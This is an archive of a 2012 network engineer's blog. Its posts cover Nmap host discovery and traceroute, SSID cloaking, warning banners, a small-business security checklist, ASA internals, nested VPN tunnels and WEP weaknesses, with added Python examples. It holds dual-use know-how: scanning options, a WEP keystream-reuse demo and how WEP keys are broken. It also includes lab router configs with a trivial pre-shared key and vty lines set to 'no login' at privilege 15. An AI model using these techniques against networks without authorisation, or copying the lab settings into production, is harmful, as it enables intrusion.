2012-08-12

Nmap For The Network Engineer: Part 2

Host Discovery with Nmap

Nmap has a number of great options for host discovery. The big thing to remember is that Nmap will always attempt to discover live hosts before port scanning and will only port scan the hosts it detects. If all you want to do is a simple network sweep you have to use the -sn argument to disable port scanning, even if you specify other discovery methods. Without -sn Nmap will discover targets using any specified method but will then run a port scan on top of that. Conversely, if you use the -Pn argument Nmap will try to scan hosts even if they don't respond to any of the host discovery methods. Beyond that, Nmap will always use ARP as its default method for discovering hosts on the same subnet. The default behavior for hosts on remote subnets is to probe with an ICMP echo request + ICMP timestamp request + TCP SYN to 80 and TCP SYN to 443 to increase the odds of successful discovery. One last thing: if Nmap was called without root / system privileges it will only be able to try to initiate a TCP three-way handshake for remote hosts.

Here is a miniature cheat sheet I drew up specifically for host discovery. I will eventually draw up something similar for all the major scanning options and combine them into a single cheat sheet but for now enjoy this one.



Below I included some sample outputs, the associated tcpdump, and a short description of each argument.



The -sn argument tells Nmap to disable port scanning. This allows you to do only a simple host discovery. When -sn is used without any other options it defaults to a simple ICMP echo request and ICMP timestamp query and stops there.

The -PS[p] argument allows you to see if a host is alive using a TCP SYN packet. If you put a number in for [p] it will send a SYN to that port, otherwise Nmap defaults to port 80.

Using -PA[p] will send TCP ACK for host discovery. Again adding a number for [p] will tell Nmap to send an ACK to that specific port. If omitted it will default to 80.

Using -PE will only result in a standard ICMP echo request.

The -PP argument will invoke ICMP timestamp requests.

With -PM it will try to use ICMP address mask requests.


When using -PR Nmap will only use ARP requests.


The -PO[id] argument gives some interesting options. With this you can test for responses with a number of different IP protocols. Wikipedia has a pretty good list of the different IP protocol numbers (http://en.wikipedia.org/wiki/List_of_IP_protocol_numbers).
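Once a sweep is done the useful part is what you do with the result. The following is an added example, not part of the original post or of Nmap itself: it parses the XML that -oX produces for a -sn sweep, lists the live hosts together with the probe that got the answer (the "reason" attribute, which is how you can tell ARP, echo, SYN and ACK discovery apart after the fact) and compares the live addresses against an approved inventory. The XML sample is constructed to look like Nmap's output; the inventory set and the hostnames are assumptions.

```python
import xml.etree.ElementTree as ET

# Constructed sample of what `nmap -sn -oX - 192.168.1.0/29` might write (not real scan output).
SAMPLE_XML = """<?xml version="1.0" encoding="UTF-8"?>
<nmaprun scanner="nmap" args="nmap -sn -oX - 192.168.1.0/29" version="6.01">
<host><status state="up" reason="arp-response" reason_ttl="0"/>
<address addr="192.168.1.1" addrtype="ipv4"/>
<address addr="00:11:22:33:44:55" addrtype="mac"/>
<hostnames><hostname name="gw.lab.example" type="PTR"/></hostnames></host>
<host><status state="down" reason="no-response" reason_ttl="0"/>
<address addr="192.168.1.2" addrtype="ipv4"/></host>
<host><status state="up" reason="echo-reply" reason_ttl="64"/>
<address addr="192.168.1.3" addrtype="ipv4"/></host>
<host><status state="up" reason="syn-ack" reason_ttl="128"/>
<address addr="192.168.1.4" addrtype="ipv4"/></host>
<runstats><finished elapsed="1.23"/><hosts up="3" down="1" total="4"/></runstats>
</nmaprun>
"""


def parse_hosts(xml_text):
    """One dict per <host>: state, the probe that got the answer, IP, MAC and PTR name."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    hosts = []
    for host in root.iter("host"):
        status = host.find("status")
        entry = {"ip": None, "mac": None, "hostname": None,
                 "state": status.get("state"), "reason": status.get("reason")}
        for addr in host.findall("address"):
            if addr.get("addrtype") in ("ipv4", "ipv6"):
                entry["ip"] = addr.get("addr")
            elif addr.get("addrtype") == "mac":
                entry["mac"] = addr.get("addr")
        name = host.find("hostnames/hostname")
        if name is not None:
            entry["hostname"] = name.get("name")
        hosts.append(entry)
    return hosts


def live_hosts(xml_text):
    return [h for h in parse_hosts(xml_text) if h["state"] == "up"]


def discovery_reasons(xml_text):
    """How many live hosts each discovery probe accounted for (arp-response, echo-reply, ...)."""
    counts = {}
    for h in live_hosts(xml_text):
        counts[h["reason"]] = counts.get(h["reason"], 0) + 1
    return counts


def unknown_hosts(xml_text, inventory):
    """Live addresses missing from the approved inventory: the defensive use of a sweep."""
    return sorted(h["ip"] for h in live_hosts(xml_text) if h["ip"] not in inventory)


if __name__ == "__main__":
    for h in live_hosts(SAMPLE_XML):
        print(f'{h["ip"]:<15} {h["reason"]:<14} {h["mac"] or "-":<18} {h["hostname"] or ""}')
    print("not in inventory:", unknown_hosts(SAMPLE_XML, {"192.168.1.1", "192.168.1.3"}))
```

A MAC address only shows up for hosts discovered with ARP on the local subnet, which is a quick way to confirm which of the two code paths in the post Nmap actually took for a given target.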

2012-08-04

Annoying P2V problem

Just fixed an annoying problem with a P2V of a Windows 7 laptop. The VMware converter would throw the error "FAILED: Unable to find the system volume, reconfiguration is not possible" in the reconfiguration phase and bomb out at 98% completion. If you tried to boot the VM anyway you would get a BSOD with error 7B.

After a bit of Google-Fu I found the following steps were successful in repairing the VM to a point where the converter could properly run the reconfiguration on it.


1. Boot the VM to a Windows 7 ISO and select the repair option
2. Open a command prompt and run the following commands
     c:\>  bootrec.exe /fixmbr
     c:\>  bootsect.exe /nt60 all /force
     c:\>  attrib -h -s C:\boot\BCD
     c:\>  del C:\boot\BCD
     c:\>  bootrec.exe /rebuildbcd
3. Shutdown the VM
4. Open the VM in the converter and reconfigure the machine
5. The VM should now boot properly

2012-07-29

Nmap For The Network Engineer: Part 1

Over the years Nmap has evolved from just a simple port scanner. It has become a Swiss Army knife of network scanning and has a number of tools built in, including traceroute, port scanning, ping sweeps, OS fingerprinting, and version scanning. Even beyond that there is the Nmap scripting engine, which has incredible flexibility but is beyond the scope of what I am covering; maybe something for a future post.

Let's start with traceroute. Nmap's implementation of traceroute is very different from any other kind of traceroute out there. When you start a traceroute to a remote host Nmap will guess the number of hops to the remote host and adjust that up or down based on the responses until it gets the exact number. Once that number is known Nmap will then decrement the TTL until it reaches 0 or it hits a hop/router it has already discovered. In short, Nmap works backwards. This is pretty inefficient for single hosts; however, in larger complex environments with multiple subnets and multiple network branches it becomes substantially more efficient than traditional traceroute, since Nmap never repeats a trace over known hops.
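To make the backwards-walking behaviour concrete, here is an added simulation (not from the post and not Nmap's own code): a constructed ten-target topology, a classic TTL-incrementing trace, and an Nmap-style trace that first finds the distance from a guessed TTL and then walks the TTL down, stopping as soon as it reaches a router seen in an earlier trace. The addresses and the hop-reuse bookkeeping are assumptions of the model, not Nmap internals; the probe counts show the trade-off the paragraph describes (one host costs more, many hosts behind shared routers cost far less).

```python
# Constructed topology: the hop-by-hop path from the scanner to each target.
CORE = ["192.168.0.1", "10.0.0.1", "10.0.0.5", "10.0.0.9"]
PATHS = {f"10.1.1.{i}": CORE + ["10.1.1.1", f"10.1.1.{i}"] for i in range(10, 18)}
PATHS.update({f"10.2.2.{i}": CORE[:3] + ["10.0.0.13", "10.2.2.1", f"10.2.2.{i}"]
              for i in (10, 11)})


class Network:
    """Answers TTL-limited probes the way routers and hosts do, and counts them."""

    def __init__(self, paths):
        self.paths = paths
        self.probes = 0

    def probe(self, target, ttl):
        self.probes += 1
        path = self.paths[target]
        # The TTL expires at hop `ttl` (time exceeded from that router) unless it reaches the target.
        return path[-1] if ttl >= len(path) else path[ttl - 1]


def classic_traceroute(net, target):
    """Traditional traceroute: TTL 1, 2, 3, ... until the target itself answers."""
    hops, ttl = [], 1
    while True:
        reply = net.probe(target, ttl)
        hops.append(reply)
        if reply == target:
            return hops
        ttl += 1


def nmap_style_traceroute(net, target, known, guess):
    """Nmap's approach as the post describes it: find the distance starting from a guessed
    TTL, then walk the TTL downwards and stop at the first hop already seen in an earlier
    trace. `known` maps a router address to the path that leads to it."""
    ttl = guess
    reply = net.probe(target, ttl)
    if reply == target:          # guessed far enough: back off until a router answers instead
        while ttl > 1 and net.probe(target, ttl - 1) == target:
            ttl -= 1
    else:                        # guessed too short: step out until the target answers
        while reply != target:
            ttl += 1
            reply = net.probe(target, ttl)
    distance = ttl
    hops = [None] * distance
    hops[distance - 1] = target
    for t in range(distance - 1, 0, -1):
        router = net.probe(target, t)
        if router in known and len(known[router]) == t:
            hops[:t] = known[router]        # reuse the prefix discovered for an earlier target
            break
        hops[t - 1] = router
    for i, hop in enumerate(hops):          # remember every hop for later targets
        known.setdefault(hop, hops[: i + 1])
    return hops


def compare(paths, guess):
    """Total probes spent tracing every target: (classic, nmap-style)."""
    classic, nmap, known = Network(paths), Network(paths), {}
    for target in paths:
        classic_traceroute(classic, target)
        nmap_style_traceroute(nmap, target, known, guess)
    return classic.probes, nmap.probes


if __name__ == "__main__":
    print("classic vs nmap-style probes for all targets:", compare(PATHS, guess=6))
```

With an exact guess the single-host trace costs one more probe than the classic walk (two probes to confirm the distance, then five hops), but every further host behind an already-traced router costs only three probes instead of six.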


Here is a little diagram outlining what it looks like visually.


I'll cover the other major functions and release a cheat sheet for common and most used switches when I get the time to write one up.

2012-07-24

Wireless SSID Cloaking

Is wireless SSID cloaking good for security? Short answer, no. Cloaking doesn't provide any real measure of security and in some circumstances could actually negatively impact security.

Long answer. Cloaking the SSID only prevents an access point from including the name of the SSID in the beacon and probe response frames but does nothing for any active wireless clients transmitting data. The 802.11 standard requires the SSID name to be a part of all data-carrying frames; there is no way around this. If someone has an active sniffer running that can read the full 802.11 frame then they will see the SSID regardless of whether the AP is set to run SSID cloaking. Also, using encryption (WPA/WPA2/WEP) does not hide the SSID in the 802.11 frame, since the SSID is part of the frame header and the encryption only hides the frame payload.

This gets even dicier because in some circumstances SSID cloaking can actually be a security risk. When configured to join a non-broadcasting network Windows will cycle through the PNL first looking for any broadcasting networks, and if none are found Windows will then send out probes containing the SSID of the cloaked network. If an attacker is sniffing wireless they can see the SSID in the probes and then use a tool like Karma / Karmetasploit to go phishing for computers set up to auto-connect.

2012-07-17

A little bit about warning banners

I had a good talk today over warning banners and what should go into them so I thought I would share a bit about what was discussed.

Why have a warning banner? The big reason for having a warning banner is to limit the presumption of privacy. After all, you could argue that you never knew gaining access to an unintended system was wrong because nothing told you it was off limits. Even worse you could go after IT and security staff for monitoring or recording your actions without your consent. However, with proper use of a warning banner you can protect yourself by expressly stating that such actions are in violation and that proper steps have been taken to monitor and report criminal activity.

Now that we know why warning banners are needed, the question is just what should go into one? First, and most importantly, you absolutely need to state that any use of the resource being accessed may be monitored and recorded. This is the holy grail of warning banner content and trumps any other single item you can stuff into one. Next you should be careful to state that any access is limited strictly to authorized personnel and activity and that any unauthorized attempt to access, use, or modify the resource is strictly prohibited. There should also be a clause stating that any unauthorized use could result in either criminal or civil charges, and that if the monitoring reveals evidence of criminal activity the company may provide that information to law enforcement.

Now I am not a lawyer nor do I pretend to be one. If you make a warning banner have some legal counsel approve it (in writing) to make sure the verbiage is solid and accurate. This is extra important if you are setting this up in countries outside your own because some may have very explicit laws regarding privacy and what you are and aren't allowed to do.

2012-07-15

Easy high level security tips and questions

Over the last few years I have had to deal with a lot of smaller businesses and the general lack of security has been horrifying. Every single small business I have been to has, without any exceptions, failed at some of the most basic things. In light of this I have started to cobble together an easy-to-read, high-level security review/questionnaire that even non-technical people can understand, with the hope of mitigating some of the easy things and putting them on the right path.




High-Level Security Checklist

Overview - Approach environments asking these questions
- Confidentiality
  - Who has access to what information or resources?
- Integrity
  - Has any information been changed, and who changed it?
- Availability
  - Are your information and resources readily accessible when needed?

Backups
- How often are backups run?
- Do you have offsite storage for backups?
  - Keeping tapes in a car is not secure
  - Keeping them in a home is not really secure
  - Store them in a place that can be locked up and is out of harm's way!
- Do you run test restores?
- In the event recovery is needed, how quickly can the off-site backups be obtained?
- If stored with an individual, can they easily be reached at any time?
- What type of backup medium is being used?
  - Tape
    - How often are tapes replaced?
    - The cost of proper upkeep can add up
  - Cloud
    - What is the provider's privacy policy?
    - What is the provider's liability for lost data?

Patches and Software Updates
- Are Windows updates configured?
- Are you looking for Java updates?
  - Can Java be updated?
    - Some web applications can be an issue
  - Is it using automatic updates?
    - Again, be careful if you have sensitive web applications
- Are you looking for Adobe updates?
  - Adobe products are among the most notorious for having frequently patched security holes
- Are you updating your web browsers?
- Other third-party applications
  - Third-party application updates are often the hardest type of patching to stay current on

Least Privilege
- Do people run as admin on local computers?
  - Not making users local administrators and/or leaving UAC turned on can limit and mitigate the effect of malware
- File sharing permissions
  - Are there unused file shares on servers and desktops?
- Do your administrators actively use domain administrator accounts or user accounts?
  - Using a domain admin account for general purposes is a huge risk and makes it easy to compromise an environment

Passwords
- Use different passwords for different purposes
  - People tend to use the same password for everything
- Are passwords written down or stored in a secure format?
  - It is not uncommon to find passwords written on sticky notes in plain sight on or around a user's desk
  - If stored, is it in a place other people can easily access?
    - Physically written down in a desk drawer?
    - In a text file on the computer?
  - Many applications store passwords insecurely
    - Web browsers with saved passwords are notorious
- Do users share passwords or use shared accounts?
  - This should be kept to an absolute minimum
  - When looking at audit trails, how can you tell which user made a change?
- Complexity requirements
  - How long do passwords last before needing to be changed?
    - Too long between changes is bad
    - If changing a password occurs too often, users tend to write them down and often store them insecurely
  - How long are your passwords?
    - The absolute minimum should be 8
    - Long passphrases are recommended
    - Length is more important than traditional complexity
  - Do you require specific character sets?
    - Less important than length
    - Most password crackers substitute common letter-to-symbol replacements (1 to !, a to @, s to $) as they try different dictionary words
  - Are your passwords based on dictionary words?
    - This can easily be tested with password auditing
    - Dictionary words with numbers after them and/or character substitution are not effective

Anti-Virus/Malware
- Important, but it's not a silver bullet
- It's not about total prevention but rather about reducing your attack surface to manageable levels
- Are you up to date on your subscriptions and definitions?

Firewalls
- Do you have appropriate rules for traffic / email / content filtering?
  - Are you blocking inbound traffic?
  - Are you blocking outbound traffic?
- Are you blocking inbound traffic from regions you don't do business in? (If you don't do business outside the US, block traffic from China.)
- Are you using a VPN solution for remote access?

Wireless
- Are you using WPA/WPA2 with AES?
  - WEP is NOT secure and is very easily hacked
  - TKIP encryption has known flaws and is not recommended
- MAC address filtering doesn't help
- SSID cloaking can give a false sense of security, can even be a risk in itself, and is not recommended

Encryption
- Do you have data that requires using disk encryption?
  - PGP / TrueCrypt
- Do you need email encryption?
  - PGP / GnuPG

Data Removal
- How do you decommission old computers?
- Do you erase data before getting rid of a computer?
  - Just deleting from Windows is not enough and leaves the original files intact in a way that they can be easily extracted
  - Secure erase with third-party tools is recommended

Disaster Recovery
- Do you have a disaster recovery plan?
  - Does it cover data loss?
  - Does it cover equipment loss?
    - Is there spare equipment available if needed?
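The password items in the checklist (minimum length of 8, prefer long passphrases, dictionary words with trailing numbers or symbol substitutions are not effective) can be turned into a simple audit. The following is an added example, not part of the checklist: it strips leading/trailing digits and symbols, reverses the common letter-to-symbol substitutions, and checks the remaining base word against a dictionary, which is a simplified version of what a cracker's rule engine does. The word list and the substitution table are constructed and deliberately small; a real audit would use a large wordlist plus company-specific terms.

```python
import re

# Constructed mini dictionary; a real audit would use a large wordlist plus company-specific terms.
DICTIONARY = {"password", "summer", "winter", "welcome", "company", "dragon", "monkey", "letmein"}
MIN_LENGTH = 8           # the checklist's absolute minimum
PASSPHRASE_LENGTH = 16   # assumed threshold for "long passphrase"

# Reverse the usual letter-to-symbol substitutions (constructed table; crackers carry far more rules).
UNLEET = str.maketrans("@$!103457", "asiloeast")


def base_words(password):
    """Candidate base words a rule engine would recover: strip leading and/or trailing
    digits and symbols, undo the substitutions, lowercase."""
    strip_lead = re.sub(r"^[^A-Za-z]+", "", password)
    strip_tail = re.sub(r"[^A-Za-z]+$", "", password)
    strip_both = re.sub(r"[^A-Za-z]+$", "", strip_lead)
    return {c.translate(UNLEET).lower() for c in (password, strip_lead, strip_tail, strip_both)}


def audit(password):
    """Return a list of finding codes; an empty list means none of these checks fired."""
    findings = []
    if len(password) < MIN_LENGTH:
        findings.append("too_short")
    if any(word in DICTIONARY for word in base_words(password)):
        findings.append("dictionary_word")
    if len(password) < PASSPHRASE_LENGTH:
        findings.append("below_passphrase_length")
    return findings


if __name__ == "__main__":
    for candidate in ("Summer2012!", "P@ssw0rd", "abc123", "Tr0ub4dor&3", "correct horse battery staple"):
        print(f"{candidate!r}: {audit(candidate) or 'no findings'}")
```

"Tr0ub4dor&3" passes the dictionary check only because "troubador" is not in this tiny list, which is exactly why the dictionary used for auditing has to be large and why length beats substitution tricks.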

Web GUI for IOU

Been a while since my last post. Lots of changes going on, new job, new place, and more so time has really been constrained. On a side note can't wait till Defcon 20. See you in Las Vegas!

I recently ran across an interesting page about a web GUI for running IOU. I haven't had a chance to check it out yet but it seemed pretty cool.

https://the1979s.wordpress.com/cisco/cisco-iou-web-interface/


2012-04-08

ASA 5505 Under the Hood

As part of preparing to run a training on Cisco ASAs for some help desk techs I drew up a diagram to logically show how the ASA 5505 works under the hood with regard to its 8-port switch and the virtual interfaces used for passing traffic.

Inside the ASA 5505 there is an 8-port 10/100 switch that functions just like you would expect any old layer 2 switch to work. It's only through the use of virtual "VLAN interfaces" that the ASA 5505 is able to route, control, and NAT traffic. At its most basic a VLAN interface is a virtual interface that exists inside the ASA software and is bound to a layer 2 VLAN. It acts like a routed interface on an ASA 5510 and higher, a normal router, or a VLAN interface on a layer 3 switch.




2012-03-12

VPNCEPTION

A while back I was asked if it was possible to run a series of tunnels between three routers. The requirements were that routers A and B had a GRE over IPSec tunnel and routers A and C had a GRE tunnel that went inside the tunnel between A and B.

After a beer or two and spending some time on the white board I came up with a solution that used a series of VTIs and routing to control traffic flow. Everything looked plausible so it was time to lab out a proof of concept. After fiddling with the routing a little bit I was able to ping loopback interfaces between routers A and C and was able to verify complete traversal by checking the tunnel statistics and IPsec packet encaps and decaps. Success!

Had a lot of fun doing this one; I had never had to work with nested tunnels before so it was a great experience.



Here is how it looked on the white board.



And now for the router configs. These are lab configs: the pre-shared key "cisco" and the "no login" on the vty lines were shortcuts for the proof of concept and should not be carried into anything production.



-------------R1------------
Router(config)#do show run
Building configuration...

Current configuration : 1779 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 5
crypto isakmp key cisco address 10.10.50.2
!
!
crypto ipsec transform-set vpntransform esp-aes esp-sha-hmac
 mode transport
!
crypto ipsec profile vti-profile
 set transform-set vpntransform
!
!
!
!
!
interface Loopback0
 ip address 192.168.4.1 255.255.255.0
!
interface Tunnel0
 ip address 172.16.50.1 255.255.255.252
 tunnel source FastEthernet0/0
 tunnel destination 10.10.50.2
 tunnel mode ipsec ipv4
 tunnel protection ipsec profile vti-profile
!
interface Tunnel1
 ip address 172.16.51.1 255.255.255.252
 tunnel source Tunnel0
 tunnel destination 172.16.50.2
!
interface Tunnel2
 ip address 172.16.52.1 255.255.255.252
 tunnel source Tunnel1
 tunnel destination 10.10.60.2
!
interface FastEthernet0/0
 ip address 10.10.50.1 255.255.255.252
 duplex auto
 speed auto
!
interface FastEthernet0/1
 no ip address
 shutdown
 duplex auto
 speed auto
!        
ip forward-protocol nd
ip route 10.10.60.0 255.255.255.252 Tunnel1
ip route 192.168.6.0 255.255.255.0 Tunnel2
!
!
no ip http server
no ip http secure-server
!
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!        
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end






-------------R2------------
Router(config)#do show run
Building configuration...

Current configuration : 1549 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
crypto isakmp policy 10
 encr aes
 authentication pre-share
 group 5
crypto isakmp key cisco address 10.10.50.1
!
!
crypto ipsec transform-set vpntransform esp-aes esp-sha-hmac
 mode transport
!
crypto ipsec profile vti-profile
 set transform-set vpntransform
!
!
!
!
!
interface Loopback0
 ip address 192.168.5.1 255.255.255.0
!
interface Tunnel0
 ip address 172.16.50.2 255.255.255.252
 tunnel source FastEthernet0/0
 tunnel destination 10.10.50.1
 tunnel mode ipsec ipv4
 tunnel protection ipsec profile vti-profile
!
interface Tunnel1
 ip address 172.16.51.2 255.255.255.252
 tunnel source Tunnel0
 tunnel destination 172.16.50.1
!
interface FastEthernet0/0
 ip address 10.10.50.2 255.255.255.252
 duplex auto
 speed auto
!
interface FastEthernet0/1
 ip address 10.10.60.1 255.255.255.252
 duplex auto
 speed auto
!
ip forward-protocol nd
!
!
no ip http server
no ip http secure-server
!        
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end





-------------R3------------
Router(config-if)#do show run
Building configuration...

Current configuration : 1177 bytes
!
version 12.4
service timestamps debug datetime msec
service timestamps log datetime msec
no service password-encryption
!
hostname Router
!
boot-start-marker
boot-end-marker
!
!
no aaa new-model
memory-size iomem 5
ip cef
!
!
!
!
no ip domain lookup
ip auth-proxy max-nodata-conns 3
ip admission max-nodata-conns 3
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!
!        
!
interface Loopback0
 ip address 192.168.6.1 255.255.255.0
!
interface Tunnel2
 ip address 172.16.52.2 255.255.255.252
 tunnel source FastEthernet0/1
 tunnel destination 172.16.51.1
!
interface FastEthernet0/0
 no ip address
 shutdown
 duplex auto
 speed auto
!
interface FastEthernet0/1
 ip address 10.10.60.2 255.255.255.252
 duplex auto
 speed auto
!
ip forward-protocol nd
ip route 172.16.51.0 255.255.255.252 10.10.60.1
ip route 192.168.4.0 255.255.255.0 Tunnel2
!
!
no ip http server
no ip http secure-server
!
!
!
!
control-plane
!
!
!
!
!
!
!
!
!
!
line con 0
 exec-timeout 0 0
 privilege level 15
 logging synchronous
line aux 0
line vty 0 4
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
line vty 5 15
 exec-timeout 0 0
 privilege level 15
 logging synchronous
 no login
!
!
end
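The part that took the fiddling above is the recursive route lookup: a packet for R3's loopback is routed into Tunnel2, whose outer header is routed into Tunnel1, whose outer header is routed into Tunnel0, whose outer header finally leaves FastEthernet0/0 under ESP. The following is an added example, not part of the original post or of IOS: it transcribes R1's interfaces and static routes from the show run above into data, resolves the encapsulation chain with longest-prefix matching, and raises an error for the classic failure mode of a tunnel whose destination is routed back through itself (recursive routing). The data structure and the misconfigured route used in the test are assumptions.

```python
import ipaddress

# R1's interfaces and static routes, transcribed from the "show run" in the post.
R1_INTERFACES = {
    "Loopback0":       {"addr": "192.168.4.1/24"},
    "FastEthernet0/0": {"addr": "10.10.50.1/30"},
    "Tunnel0": {"addr": "172.16.50.1/30", "source": "FastEthernet0/0",
                "destination": "10.10.50.2", "encap": "ipsec"},   # tunnel mode ipsec ipv4 (VTI)
    "Tunnel1": {"addr": "172.16.51.1/30", "source": "Tunnel0",
                "destination": "172.16.50.2", "encap": "gre"},
    "Tunnel2": {"addr": "172.16.52.1/30", "source": "Tunnel1",
                "destination": "10.10.60.2", "encap": "gre"},
}
R1_STATIC_ROUTES = [("10.10.60.0/30", "Tunnel1"), ("192.168.6.0/24", "Tunnel2")]


def build_table(interfaces, static_routes):
    """Static routes plus the connected route of every interface."""
    table = [(ipaddress.ip_network(net), iface) for net, iface in static_routes]
    for name, cfg in interfaces.items():
        table.append((ipaddress.ip_interface(cfg["addr"]).network, name))
    return table


def lookup(table, dest):
    """Longest-prefix match; returns the egress interface name."""
    d = ipaddress.ip_address(dest)
    matches = [(net, iface) for net, iface in table if d in net]
    if not matches:
        raise LookupError(f"no route to {dest}")
    return max(matches, key=lambda m: m[0].prefixlen)[1]


def encapsulation_chain(src, dst, interfaces, static_routes):
    """Follow the route for dst; each time it points at a tunnel, wrap the packet in that
    tunnel's outer header and route again. Returns [(src, dst, egress, encap), ...],
    innermost header first, ending at a physical interface ("wire")."""
    table = build_table(interfaces, static_routes)
    chain, visited = [], set()
    while True:
        iface = lookup(table, dst)
        if iface in visited:
            raise RuntimeError(f"recursive routing: {iface} is reached through itself")
        visited.add(iface)
        cfg = interfaces[iface]
        if "destination" not in cfg:           # physical interface: done
            chain.append((src, dst, iface, "wire"))
            return chain
        chain.append((src, dst, iface, cfg["encap"]))
        # Outer header: source is the address of the 'tunnel source' interface.
        src = str(ipaddress.ip_interface(interfaces[cfg["source"]]["addr"]).ip)
        dst = cfg["destination"]


if __name__ == "__main__":
    for layer in encapsulation_chain("192.168.4.1", "192.168.6.1", R1_INTERFACES, R1_STATIC_ROUTES):
        print("%-12s -> %-12s via %-16s (%s)" % layer)
```

The chain is also the order in which to read the counters when troubleshooting: Tunnel2 and Tunnel1 packet counts first, then the IPsec SA encaps/decaps for Tunnel0.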

2012-03-06

Why WEP Sucks

Before I go into the details on why WEP sucks it's important to understand how it works. WEP was designed around the RC4 stream cipher and supports 64-bit or 128-bit keys. The first 24 bits of a WEP key are known as the initialization vector (IV) and are supposed to be a random and unique value for each packet. The IV is combined with the pre-shared key and fed into the RC4 algorithm to produce a pseudo-random stream, or PRGA. WEP then XORs the PRGA against a clear text packet and its integrity checksum to produce an encrypted packet.

Now here is where WEP starts to go downhill. Once the encrypted packet is generated the 24-bit IV that was used is prepended to the encrypted packet in clear text before it's sent to the destination. This means WEP only effectively provides 40 or 104 bits of protection.

If the IVs were never re-used it wouldn’t be nearly as big a problem. Now consider that the 24 bits used in an IV provides about 16.7 million possible combinations. This may sound like a lot but in reality the likelihood of having the same IV re-used is very high and is well illustrated by a situation known as the birthday paradox. On average it only takes about 5,000 packets to yield a 50% chance of seeing a collision; that is when two packets with the same IV are seen.

When two packets using the same pre-shared key have a colliding IV they will also share the same PRGA used to encrypt the packet. If the contents of a packet can be deduced or predicted then it becomes possible to XOR the known clear text against its encrypted form to reproduce the PRGA. Once the PRGA is known any further packets with a colliding IV can be decrypted. Although this doesn’t reveal the pre-shared key the ability to decrypt single packets is still a problem. That’s strike one.

WEP also has zero replay protection. What makes this one so bad is the normal authentication and challenge/response process used by WEP. When an AP sends a challenge to a client it is sent in clear text along with the IV. When received, the client uses the provided IV and WEP key to encrypt the challenge and sends it back to the AP. If the challenge/response is captured then we have a known packet and its encrypted counterpart. All you need to do is XOR the challenge with the response and you will reproduce the PRGA for packets with the same IV. This is especially bad because you can then inject traffic into a network that will elicit predictable responses, leading to more known IV and PRGA pairs. That's strike two.

Now to bring it all home, this is the coup de grâce on why WEP sucks. Nearly every single packet sent has a standard Ethernet header. The header always starts with 0xAA 0xAA and is at a predictable location inside an encrypted packet. Knowing this you can use the encrypted packets and their known IVs to brute force keys that return 0xAA 0xAA at the expected locations. There is also a similar method that focuses on known parts of a standard ARP request. When the ability to phish for encrypted packets and IVs is combined with replaying and injection it becomes possible to break WEP outright in as little as 1 minute. That's strike three.

If breaking the encryption wasn't bad enough we also need to consider the fact that WEP uses a very poor check for data integrity. The integrity algorithm used by WEP is only CRC32, which was never designed for cryptographic security and can easily be spoofed. What's even worse is that WEP and CRC32 don't roll any secret element into the calculation, so there is nothing to verify the data came from a legitimate source.

TLDR: If you care about security avoid WEP because it sucks and offers no real protection against intelligent and or targeted attacks.
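Two of the numbers above can be checked directly. The following is an added illustration, not part of the original post: the birthday-paradox calculation behind "about 5,000 packets" for a 24-bit IV, and the strike-one effect (two packets under the same IV share the same PRGA output, so one known plaintext reveals the keystream that decrypts the other), using a small textbook RC4 implementation. The 40-bit pre-shared key, the IV and both packet bodies are constructed values.

```python
IV_BITS = 24
IV_SPACE = 2 ** IV_BITS   # 16,777,216 possible IVs


def collision_probability(n, space=IV_SPACE):
    """Birthday paradox: probability that at least two of n random IVs are equal."""
    p_unique = 1.0
    for i in range(n):
        p_unique *= (space - i) / space
    return 1.0 - p_unique


def packets_for_collision(target=0.5, space=IV_SPACE):
    """Smallest n with P(collision) >= target; the post's 'about 5,000 packets'."""
    p_unique, n = 1.0, 0
    while 1.0 - p_unique < target:
        p_unique *= (space - n) / space   # one more IV drawn without a repeat
        n += 1
    return n


def rc4(key, data):
    """Textbook RC4: key-scheduling, then the PRGA output XORed over the data."""
    s = list(range(256))
    j = 0
    for i in range(256):                                  # KSA
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:                                     # PRGA
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def xor(a, b):
    return bytes(x ^ y for x, y in zip(a, b))


def wep_encrypt(psk, iv, plaintext):
    """WEP-style framing: RC4 keyed with IV || pre-shared key; the IV travels in the clear."""
    return iv + rc4(iv + psk, plaintext)


def keystream_reuse(psk, iv, known_plain, secret_plain):
    """Strike one: with a colliding IV, ciphertext XOR known plaintext is the PRGA output,
    and that output decrypts the other packet (as far as the known plaintext reaches)."""
    pkt_known = wep_encrypt(psk, iv, known_plain)
    pkt_secret = wep_encrypt(psk, iv, secret_plain)
    if pkt_known[:3] != pkt_secret[:3]:
        raise ValueError("IVs differ; no collision to exploit")
    keystream = xor(pkt_known[3:], known_plain)
    return xor(pkt_secret[3:], keystream)


if __name__ == "__main__":
    print("packets for a 50% IV collision:", packets_for_collision())
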